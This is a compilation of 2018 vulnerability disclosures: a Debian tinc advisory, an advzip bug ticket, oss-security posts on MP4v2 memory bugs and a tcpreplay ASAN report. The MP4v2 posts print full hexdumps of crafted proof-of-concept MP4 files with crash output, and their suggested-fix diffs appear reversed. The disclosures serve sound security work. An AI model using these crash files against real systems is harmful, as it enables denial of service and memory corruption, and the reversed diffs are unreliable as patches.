tinc 1.0.30 through 1.0.34 has a broken authentication protocol, although there is a partial mitigation. This is fixed in 1.1.

**Debian Security Advisory**

Date Reported:

08 Oct 2018

Affected Packages:

tinc

Vulnerable:

Yes

Security database references:

In Mitre's CVE dictionary: CVE-2018-16738, CVE-2018-16758.  

More information:

Several vulnerabilities were discovered in tinc, a Virtual Private Network (VPN) daemon. The Common Vulnerabilities and Exposures project identifies the following problems:

*   CVE-2018-16738
    
    Michael Yonli discovered a flaw in the implementation of the authentication protocol that could allow a remote attacker to establish an authenticated, one-way connection with another node.
    
*   CVE-2018-16758
    
    Michael Yonli discovered that a man-in-the-middle that has intercepted a TCP connection might be able to disable encryption of UDP packets sent by a node.
    

For the stable distribution (stretch), these problems have been fixed in version 1.0.31-1+deb9u1.

We recommend that you upgrade your tinc packages.

For the detailed security status of tinc please refer to its security tracker page at: https://security-tracker.debian.org/tracker/tinc

CVE-2018-16738: Debian -- Security Information -- DSA-4312-1 tinc

An out-of-bounds heap buffer read flaw was found in the way advancecomp before 2.1-2018/02 handled processing of ZIP files. An attacker could potentially use this flaw to crash the advzip utility by tricking it into processing crafted ZIP files.

**#259 CVE-2018-1056: heap buffer overflow while running advzip**

Status: closed-fixed

Owner: nobody

Labels: None

Priority: 5

Updated: 2018-02-12

Created: 2018-02-10

Private: No

Hello,

Debian received a bug report about a heap-based buffer overflow in advzip.

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=889270

The bug reporter also submitted a POC attached to this bug report. This issue has a possible security impact and CVE-2018-1056 was assigned to it.

**Discussion**

*   ![Andrea Mazzoleni](https://secure.gravatar.com/avatar/162819843c0db85a14a7c559d4b509f8?r=pg&d=https%3A%2F%2Fa.fsdn.com%2Fcon%2Fimages%2Fsandiego%2Ficons%2Fdefault-avatar.png&s=48 "Andrea Mazzoleni")
    
    Thanks for the report.
    
    It's fixed in the just released v2.1
    
    Ciao,  
    Andrae
    

*   ![Andrea Mazzoleni](https://secure.gravatar.com/avatar/162819843c0db85a14a7c559d4b509f8?r=pg&d=https%3A%2F%2Fa.fsdn.com%2Fcon%2Fimages%2Fsandiego%2Ficons%2Fdefault-avatar.png&s=48 "Andrea Mazzoleni")
    
    *   **status**: open --> closed-fixed
    

Log in to post a comment.

CVE-2018-1056: AdvanceMAME / Bugs / #259 CVE-2018-1056: heap buffer overflow while running advzip

MP4NameFirstMatches in mp4util.cpp in MP4v2 2.0.0 mishandles substrings of atom names, leading to use of an inappropriate data type for associated atoms. The resulting type confusion can cause out-of-bounds memory access.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 18 Jul 2018 16:30:41 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Out-of-bounds memory access in MP4v2 2.0.0

Hi,

A out-of-bounds memory access bug is found in MP4v2 2.0.0, a legacy
library dealing with MP4 media file.

========= find atom by type =========

The function \`FindAtom\` iterates the atom tree and find the target by
comparing its type with the given one:

 316 MP4Atom\* MP4Atom::FindChildAtom(const char\* name)
 317 {
 318     uint32\_t atomIndex = 0;
 319
 320     // get the index if we have one, e.g. moov.trak\[2\].mdia...
 321     (void)MP4NameFirstIndex(name, &atomIndex);
 322
 323     // need to get to the index'th child atom of the right type
 324     for (uint32\_t i = 0; i < m\_pChildAtoms.Size(); i++) {
 325         if (MP4NameFirstMatches(m\_pChildAtoms\[i\]->GetType(), name)) {
 ...

However, the comparison could be passed for an crafted atom which
doesn't match in fact:

 29 bool MP4NameFirstMatches(const char\* s1, const char\* s2)
 30 {
 31     if (s1 == NULL || \*s1 == '\\0' || s2 == NULL || \*s2 == '\\0') {
 32         return false;
 33     }
 34
 35     if (\*s2 == '\*') {
 36         return true;
 37     }
 38
 39     while (\*s1 != '\\0') {
 40         if (\*s2 == '\\0' || strchr("\[.", \*s2)) {
 41             break;
 42         }
 43         if (tolower(\*s1) != tolower(\*s2)) {
 44             return false;
 45         }
 46         s1++;
 47         s2++;
 48     }
 49     return true;
 50 }

The above while-loop would exit and return true once \`s1\` ends early.
For example, \`MP4NameFirstMatches("abc\\x00", "abcd")\` returns true,
though an atom with type "abc\\x00" should never be returned when
finding atom of type "abcd".

Things are different when creating atoms. The 4-bytes type read from
file is strictly checked to determine which atom constructor to
use(src/mp4atom.cpp):

 954             if( ATOMID(type) == ATOMID("sdtp") )
 955                 return new MP4SdtpAtom(file);

The above difference between creating and finding atoms could result
in type confusion, which leads to out-of-bounds memory access.

========= MP4SdtpAtom =========

\`FindAtom\` is called to find an atom of type "sdtp" when generating
the track info(src/mp4track.cpp):

 239     // update sdtp log from sdtp atom
 240     MP4SdtpAtom\* sdtp = (MP4SdtpAtom\*)m\_trakAtom.FindAtom(
"trak.mdia.minf.stbl.sdtp" );
 241     if( sdtp ) {
 242         uint8\_t\* buffer;
 243         uint32\_t bufsize;
 244         sdtp->data.GetValue( &buffer, &bufsize );
 245         m\_sdtpLog.assign( (char\*)buffer, bufsize );
 246         free( buffer );
 247     }

So if a crafted MP4 file contains an atom of type "sdt\\x00", then this
atom would be returned and cast to \`MP4SdtpAtom\`. But its actual class
is not \`MP4SdtpAtom\` since strict comparison is used when creating the
atom. As a result, \`sdtp->data\` is actually out of the object.

========= POC =========

We build a MP4 file which contains the necessary fields. The atoms are
arranged dedicatedly so that for 32-bits program, \`sdtp->data\` would
access the trackID, which is controlled by us and would finally leads
to reading from \`0xdeadbeef\`:

root@...ian:~# xxd c4.mp4
00000000: 0000 0018 6674 7970 6d70 3432 0000 0000  ....ftypmp42....
00000010: 6d70 3432 6973 6f6d 0000 01c4 6d6f 6f76  mp42isom....moov
00000020: 0000 006c 6d76 6864 0000 0000 3030 3030  ...lmvhd....0000
00000030: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
00000040: 3030 3030 0000 0000 0000 0000 0000 0000  0000............
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0150  ...............P
00000090: 7472 616b 0000 0060 746b 6864 0000 0001  trak...\`tkhd....
000000a0: 1234 5678 2345 6789 dead bed7 0000 0000  .4Vx#Eg.........
000000b0: 9876 5432 0000 0000 4141 4141 4141 4141  .vT2....AAAAAAAA
000000c0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
000000d0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
000000e0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
000000f0: 4141 4141 0000 00e8 6d64 6961 0000 0008  AAAA....mdia....
00000100: 0565 7374 0000 0020 6864 6c72 4242 4242  .est... hdlrBBBB
00000110: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00000120: 4242 4242 0000 0020 6d64 6864 0000 0000  BBBB... mdhd....
00000130: 3030 3030 4040 4040 5050 5050 1010 1010  0000@@@@PPPP....
00000140: 9090 9090 0000 0098 6d69 6e66 0000 0008  ........minf....
00000150: 0465 7374 0000 0088 7374 626c 0000 0018  .est....stbl....
00000160: 7374 737a 0000 0000 0000 0000 0000 0000  stsz............
00000170: 0000 0000 0000 001c 7374 7363 0000 0000  ........stsc....
00000180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000190: 0000 0010 7374 636f 0000 0000 0000 0000  ....stco........
000001a0: 0000 0018 7374 7473 0000 0000 0000 0000  ....stts........
000001b0: 0000 0000 0000 0000 0000 001c 1364 7400  .............dt.
000001c0: 0000 001c 036f 3634 0000 0000 0000 0008  .....o64........
000001d0: 7374 7368 0000 0008 7364 7400            stsh....sdt.

Here's the result of running \`mp4info\` on it:

root@...ian:~# gdb /usr/bin/mp4info
Reading symbols from /usr/bin/mp4info...(no debugging symbols found)...done.
(gdb) r c4.mp4
Starting program: /usr/bin/mp4info c4.mp4
/usr/bin/mp4info version -r
c4.mp4:
ReadAtom: "c4.mp4": atom type est is suspect
ReadAtom: "c4.mp4": atom type est is suspect
ReadAtom: "c4.mp4": atom type dt is suspect
ReadAtom: "c4.mp4": atom type sdt is suspect
ReadChildAtoms: "c4.mp4": In atom stbl missing child atom stsd
ReadChildAtoms: "c4.mp4": In atom minf missing child atom dinf

Program received signal SIGSEGV, Segmentation fault.
0xf7ece2c6 in ?? () from /usr/lib/i386-linux-gnu/libmp4v2.so.2
(gdb) x/i $eip
=> 0xf7ece2c6:  mov    (%eax),%ecx
(gdb) i r eax
eax            0xdeadbeef       -559038737

The binary we test is the i386 mp4v2 package of Debian:

root@...ian:~# dpkg -s mp4v2-utils
Package: mp4v2-utils
Status: install ok installed
Priority: optional
Section: sound
Installed-Size: 281
Maintainer: Debian Multimedia Maintainers
<pkg-multimedia-maintainers@...ts.alioth.debian.org>
Architecture: i386
Source: mp4v2 (2.0.0~dfsg0-5)
Version: 2.0.0~dfsg0-5+b1
Depends: libmp4v2-2 (= 2.0.0~dfsg0-5+b1), libc6 (>= 2.4), libgcc1 (>=
1:4.2), libstdc++6 (>= 5.2)

========= fix =========

The bug can be fixed by more checks when doing type comparison. For example:

--- src/mp4util.cpp     2018-07-18 15:48:12.766709572 +0800
+++ ../mp4v2-2.0.0-orig/src/mp4util.cpp     2012-05-21 06:11:53.000000000 +0800
@@ -46,7 +46,6 @@
         s1++;
         s2++;
     }
-    if(\*s2 != '\[' && \*s2 != '.' && \*s2 != '\\0') return false;
     return true;
 }

========= Reference =========

\[1\] https://code.google.com/archive/p/mp4v2/
\[2\] http://xhelmboyx.tripod.com/formats/mp4-layout.txt

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14403: security - Out-of-bounds memory access in MP4v2 2.0.0

MP4Atom::factory in mp4atom.cpp in MP4v2 2.0.0 incorrectly uses the MP4ItemAtom data type in a certain case where MP4DataAtom is required, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted MP4 file, because access to the data structure has different expectations about layout as a result of this type confusion.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 17 Jul 2018 14:30:48 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Type confusion in MP4v2 2.0.0

Hi,

A type confusion bug is found in MP4v2 2.0.0, a legacy library dealing
with MP4 media file.

========= ilst box =========

According to ref\[2\], MP4 file could contain an \`ilst\` box, which
stands for item list. Tags such as album, author, etc., are stored
here. A typical \`ilst\` box looks like this:

\[ilst box\] --> \[nam box(full name)\] -> \[data box\]
         |---> \[cmt box(comment)\] -> \[data box\]
         |---> \[day box(created time)\] -> \[data box\]
         ...

MP4v2 would use \`MP4ItemAtom\` for nam/cmt/... box, and \`MP4DataAtom\`
for data box:

 772 MP4Atom\*
 773 MP4Atom::factory( MP4File &file, MP4Atom\* parent, const char\* type )
 774 {
 775     // type may be NULL only in case of root-atom
 776     if( !type )
 777         return new MP4RootAtom(file);
 778
 779     // construct atoms which are context-savvy
 780     if( parent ) {
 781         const char\* const ptype = parent->GetType();
 782
 783         if( descendsFrom( parent, "ilst" )) {
 784             if( ATOMID( ptype ) == ATOMID( "ilst" ))
 785                 return new MP4ItemAtom( file, type );
 786
 787             if( ATOMID( type ) == ATOMID( "data" ))
 788                 return new MP4DataAtom(file);

However, if a crafted MP4 file has the following structure:

\[ilst box\] -> \[ilst box\] -> \[data box\]

Then \`MP4ItemAtom\` would be created for the data box instead of
\`MP4DataAtom\`, since its parent is still of type \`ilst\`.

========= type confusion =========

Now, to parse the tag info of the MP4 file, \`Tags::c\_fetch\` is called,
which invokes \`genericGetItems\`:

293 MP4ItmfItemList\*
294 genericGetItems( MP4File& file )
295 {
296     MP4Atom\* ilst = file.FindAtom( "moov.udta.meta.ilst" );
297     if( !ilst )
298         return \_\_itemListAlloc();
299
300     const uint32\_t itemCount = ilst->GetNumberOfChildAtoms();
301     if( itemCount < 1 )
302         return \_\_itemListAlloc();
303
304     MP4ItmfItemList& list = \*\_\_itemListAlloc();
305     \_\_itemListResize( list, itemCount );
306
307     for( uint32\_t i = 0; i < list.size; i++ )
308         \_\_itemAtomToModel( \*(MP4ItemAtom\*)ilst->GetChildAtom( i ),
list.elements\[i\] );
309
310     return &list;
311 }

Here we first find the atom for \`ilst\`, and then iterate its child
atoms. Remember that there's a duplicate \`ilst\` in the crafted MP4
file, in which case the root \`ilst\` atom's child is a \`MP4ItemAtom\` of
type \`ilst\`, and its grandchild is a \`MP4ItemAtom\` of type \`data\`.

Then in the function \`\_\_itemAtomToModel\`, the \`MP4ItemAtom\` of type
\`ilst\` is parsed:

153 static bool
154 \_\_itemAtomToModel( MP4ItemAtom& item\_atom, MP4ItmfItem& model )
...
193     // pass 2: populate data model
194     for( uint32\_t i = 0, idata = 0; i < childCount; i++ ) {
195         MP4Atom\* atom = item\_atom.GetChildAtom( i );
196         if( ATOMID( atom->GetType() ) != ATOMID( "data" ))
197             continue;
198
199         MP4DataAtom& data\_atom = \*(MP4DataAtom\*)atom;

We can see that line 199 would cast its child to \`MP4DataAtom\`
directly, which in fact is a \`MP4ItemAtom\`. Since these two objects
are of different layout, operations on the \`data\_atom\` could lead to
memory corruption due to the type confusion.

========= POC =========

Here we create a MP4 file with two \`ilst\`s:

root@...ian:~# xxd c3.mp4
00000000: 0000 0018 6674 7970 6d70 3432 0000 0000  ....ftypmp42....
00000010: 6d70 3432 6973 6f6d 0000 00b8 6d6f 6f76  mp42isom....moov
00000020: 0000 006c 6d76 6864 0000 0000 1234 5678  ...lmvhd.....4Vx
00000030: 2345 6789 0000 0258 9876 5432 0987 6543  #Eg....X.vT2..eC
00000040: 5600 0000 0000 0000 0000 0000 0000 0000  V...............
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 dead beef 0000 0044  ...............D
00000090: 7564 7461 0000 003c 6d65 7461 0000 0000  udta...<meta....
000000a0: 0000 0030 696c 7374 0000 0028 696c 7374  ...0ilst...(ilst
000000b0: 0000 0008 6461 7461 0000 0008 6461 7461  ....data....data
000000c0: 0000 0008 6461 7461 0000 0008 6461 7461  ....data....data

It results in segfault when running \`mp4info\`:

root@...ian:~# mp4info c3.mp4
mp4info version -r
c3.mp4:
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom meta missing child atom hdlr
ReadChildAtoms: "c3.mp4": In atom moov missing child atom trak
Track   Type    Info
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom data missing child atom data
ReadChildAtoms: "c3.mp4": In atom meta missing child atom hdlr
ReadChildAtoms: "c3.mp4": In atom moov missing child atom trak
Segmentation fault

root@...ian:~#
root@...ian:~# dpkg -s mp4v2-utils
Package: mp4v2-utils
Status: install ok installed
Priority: optional
Section: sound
Installed-Size: 300
Maintainer: Debian Multimedia Maintainers
<pkg-multimedia-maintainers@...ts.alioth.debian.org>
Architecture: amd64
Source: mp4v2 (2.0.0~dfsg0-5)
Version: 2.0.0~dfsg0-5+b1
Depends: libmp4v2-2 (= 2.0.0~dfsg0-5+b1), libc6 (>= 2.14), libgcc1 (>=
1:3.0), libstdc++6 (>= 5.2)

========= fix =========

The bug is caused by the wrong assumption that the child of an \`ilst\`
can never be an \`ilst\`. So we could fix it by simply adding an ASSERT:

--- src/mp4atom.cpp     2018-07-17 11:37:01.266702613 +0800
+++ ../mp4v2-2.0.0-orig/src/mp4atom.cpp 2018-07-17 14:20:54.986316212 +0800
@@ -783,6 +783,7 @@

         if( descendsFrom( parent, "ilst" )) {
             if( ATOMID( ptype ) == ATOMID( "ilst" ))
-                ASSERT(ATOMID( type ) != ATOMID( "ilst" ));
                 return new MP4ItemAtom( file, type );

             if( ATOMID( type ) == ATOMID( "data" )) {



========= Reference =========

\[1\] https://code.google.com/archive/p/mp4v2/
\[2\] http://xhelmboyx.tripod.com/formats/mp4-layout.txt

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14379: security - Type confusion in MP4v2 2.0.0

A double free exists in the MP4StringProperty class in mp4property.cpp in MP4v2 2.0.0. A dangling pointer is freed again in the destructor once an exception is triggered.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 13 Jul 2018 14:09:48 +0800
From: Ruikai Liu <lrk700@...il.com>
To: oss-security@...ts.openwall.com
Subject: Fastbin double free in MP4v2 2.0.0

Hi,

There's a double free issue in MP4v2 2.0.0, a legacy library dealing with
MP4 media file.

========= Details =========

The buffer is first allocated during the construction of a
\`MP4Mp4vAtom::MP4Mp4vAtom\` in src/atom\_mp4v.cpp:

 46     MP4StringProperty\* pProp =
 47         new MP4StringProperty(\*this, "compressorName");
 48     pProp->SetFixedLength(32);
 49     pProp->SetCountedFormat(true);
 50     pProp->SetValue("");
 51     AddProperty(pProp); /\* 6 \*/

In which \`SetValue\` would allocate a buffer of 32 bytes for the default
value(src/mp4property.cpp):

 534         if (m\_values\[index\] == NULL) {
 535             m\_values\[index\] = (uint8\_t\*)MP4Calloc(m\_fixedValueSize);
 536             m\_valueSizes\[index\] = m\_fixedValueSize;
 537         }

Later, when parsing the atom, a try-catch block is used(src/mp4atom.cpp):

 194     try {
 195         pAtom->Read();
 196     }
 197     catch (Exception\* x) {
 198         // delete atom and rethrow so we don't leak memory.
 199         delete pAtom;
 200         throw x;
 201     }

And calling the atom's \`Read()\` would then invoke reading its
\`MP4StringProperty\` too, in which case the buffer allocated above would be
freed and re-allocaed for the actual value(src/mp4property.cpp):

 390     for( uint32\_t i = begin; i < max; i++ ) {
 391         char\*& value = m\_values\[i\];
 392
 393         // Generally a default atom setting, e.g. see atom\_avc1.cpp,
"JVT/AVC Coding"; we'll leak this string if
 394         // we don't free.  Note that MP4Free checks for null.
 395         MP4Free(value);
 396
 397         if( m\_useCountedFormat ) {
 398             value = file.ReadCountedString( (m\_useUnicode ? 2 : 1),
m\_useExpandedCount, m\_fixedLength );
 399         }

However, a crafted file could result in an exception in
\`ReadCountedString\`(src/mp4file\_io.cpp):

 93     if( file->read( buf, bufsiz, nin ))
 94         throw new PlatformException( "read failed",
sys::getLastError(), \_\_FILE\_\_, \_\_LINE\_\_, \_\_FUNCTION\_\_ );
 95     if( nin != bufsiz )
 96         throw new Exception( "not enough bytes, reached end-of-file",
\_\_FILE\_\_, \_\_LINE\_\_, \_\_FUNCTION\_\_ );

So the exception handler would invoke the deconstructor of \`pAtom\`, which
would delete its properties and free the dangling pointer for the second
time.

========= POC =========

Here's a POC file:

root@...ian:~# hexdump -Cv c1.mp4
00000000  00 00 00 18 66 74 79 70  6d 70 34 32 01 2a 00 7e
|....ftypmp42.\*.~|
00000010  6d 70 34 32 69 73 6f 6d  00 00 00 4a 6d 70 34 76
|mp42isom...Jmp4v|
00000020  6d 70 ff ff 00 01 33 a9  00 7f ff 63 00 05 00 65
|mp....3....c...e|
00000030  00 00 00 07 63 61 74 67  00 1b ff f0 64 78 74 40
|....catg....dxt@|
00000040  00 de ff 00 00 ff ff ff  ff 00 1a 00 0b 00 19 72
|...............r|
00000050  8b 00 00 00 10 23 11 64  61 74 60 00 00 00 ff 7f
|.....#.dat\`.....|
00000060  ff ff                                             |..|
00000062

The \`prev\_inuse\` flag is ignored for fastbin, and there are some other
buffers freed during the double free. Some of them happened to be of the
same size(32 bytes) and the double free check is passed for 64-bits MP4v2.
Yet for 32-bits MP4v2 those buffers are of different size the program would
abort.

root@...ian:~/src/mp4v2-2.0.0-orig-x64# dpkg -s mp4v2-utils
Package: mp4v2-utils
Status: install ok installed
Priority: optional
Section: sound
Installed-Size: 281
Maintainer: Debian Multimedia Maintainers <
pkg-multimedia-maintainers@...ts.alioth.debian.org>
Architecture: i386
Source: mp4v2 (2.0.0~dfsg0-5)
Version: 2.0.0~dfsg0-5+b1
Depends: libmp4v2-2 (= 2.0.0~dfsg0-5+b1), libc6 (>= 2.4), libgcc1 (>=
1:4.2), libstdc++6 (>= 5.2)
...

root@...ian:~# mp4info c1.mp4
mp4info version -r
c1.mp4:
\*\*\* Error in \`mp4info': double free or corruption (fasttop): 0x56d883d0 \*\*\*
...

========= Fix =========

One way to fix the bug is to clear the dangling pointer after the the first
free.

========= Reference =========

https://code.google.com/archive/p/mp4v2/

-- 
Best regards,

Ruikai Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-14054: security - Fastbin double free in MP4v2 2.0.0

get_l2len in common/get.c in Tcpreplay 4.3.0 beta1 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via crafted packets, as demonstrated by tcpprep.

![@Edward-L](https://avatars.githubusercontent.com/u/8911557?s=88&u=226f91c395505c7f97e2f29f087860c9a693b8fd&v=4)

heap-buffer-overflow in /src/common/get.c:174 function get\_l2len

command:

    /tcpprep --auto=bridge --pcap=poc --cachefile=/dev/null
    

asan report:

     AddressSanitizer: heap-buffer-overflow in /src/common/get.c:174 get_l2len
    =================================================================
    ==68006==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000effc at pc 0x4174d8 bp 0x7ffffffede30 sp 0x7ffffffede28
    READ of size 2 at 0x60200000effc thread T0
        #0 0x4174d7 in get_l2len /opt/lxf/tcpreplay/tcpreplay-master/src/common/get.c:174
        #1 0x4176b4 in get_ipv4 /opt/lxf/tcpreplay/tcpreplay-master/src/common/get.c:229
        #2 0x405fe5 in process_raw_packets /opt/lxf/tcpreplay/tcpreplay-master/src/tcpprep.c:368
        #3 0x405152 in main /opt/lxf/tcpreplay/tcpreplay-master/src/tcpprep.c:146
        #4 0x7ffff66faf44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
        #5 0x4026c8 (/opt/lxf/tcpreplay/tcpreplay-master/src/tcpprep_asan+0x4026c8)
    
    0x60200000effc is located 8 bytes to the right of 4-byte region [0x60200000eff0,0x60200000eff4)
    allocated by thread T0 here:
        #0 0x7ffff6f59862 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54862)
        #1 0x7ffff6ce270c in pcap_check_header sf-pcap.c:401
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /opt/lxf/tcpreplay/tcpreplay-master/src/common/get.c:174 get_l2len
    Shadow bytes around the buggy address:
      0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 04[fa]
      0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Contiguous container OOB:fc
      ASan internal:           fe
    ==68006==ABORTING
    

poc

![@fklassen](https://avatars.githubusercontent.com/u/1899327?s=88&u=02e835107c1ca0ac17f954825c1c44ef7456c3d5&v=4)

What version is this? What OS? Please send the output of `tcpprep -V`.

![@fklassen](https://avatars.githubusercontent.com/u/1899327?s=88&u=02e835107c1ca0ac17f954825c1c44ef7456c3d5&v=4)

Received the following which suggests the issue is in 4.3 beta1:

    Source: tcpreplay
    Version: 4.2.6-1
    Severity: important
    Tags: security upstream
    Forwarded: https://github.com/appneta/tcpreplay/issues/477
    
    Hi,
    
    The following vulnerability was published for tcpreplay.
    
    CVE-2018-13112[0]:
    | get_l2len in common/get.c in Tcpreplay 4.3.0 beta 1 allows remote
    | attackers to cause a denial of service (heap-based buffer over-read and
    | application crash) via crafted packets, as demonstrated by tcpprep.
    
    its verifiable as well with the upstream attached poc and an ASAN
    build of tcpreplay.
    
    If you fix the vulnerability please also make sure to include the
    CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
    
    For further information see:
    
    [0] https://security-tracker.debian.org/tracker/CVE-2018-13112
       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13112
    [1] https://github.com/appneta/tcpreplay/issues/477
    
    Please adjust the affected versions in the BTS as needed.
    
    Regards,
    Salvatore

![@Edward-L](https://avatars.githubusercontent.com/u/8911557?s=88&u=226f91c395505c7f97e2f29f087860c9a693b8fd&v=4)

tcpprep -V

    tcpprep version: 4.2.6 (build git:)
    Copyright 2013-2017 by Fred Klassen <tcpreplay at appneta dot com> - AppNeta
    Copyright 2000-2012 by Aaron Turner <aturner at synfin dot net>
    The entire Tcpreplay Suite is licensed under the GPLv3
    Cache file supported: 04
    Not compiled with libdnet.
    Compiled against libpcap: 1.8.1
    64 bit packet counters: enabled
    Verbose printing via tcpdump: enabled
    

os :ubuntu 14.04  
source code: commit 230d7aa

![@mkubecek](https://avatars.githubusercontent.com/u/1962116?s=88&v=4)

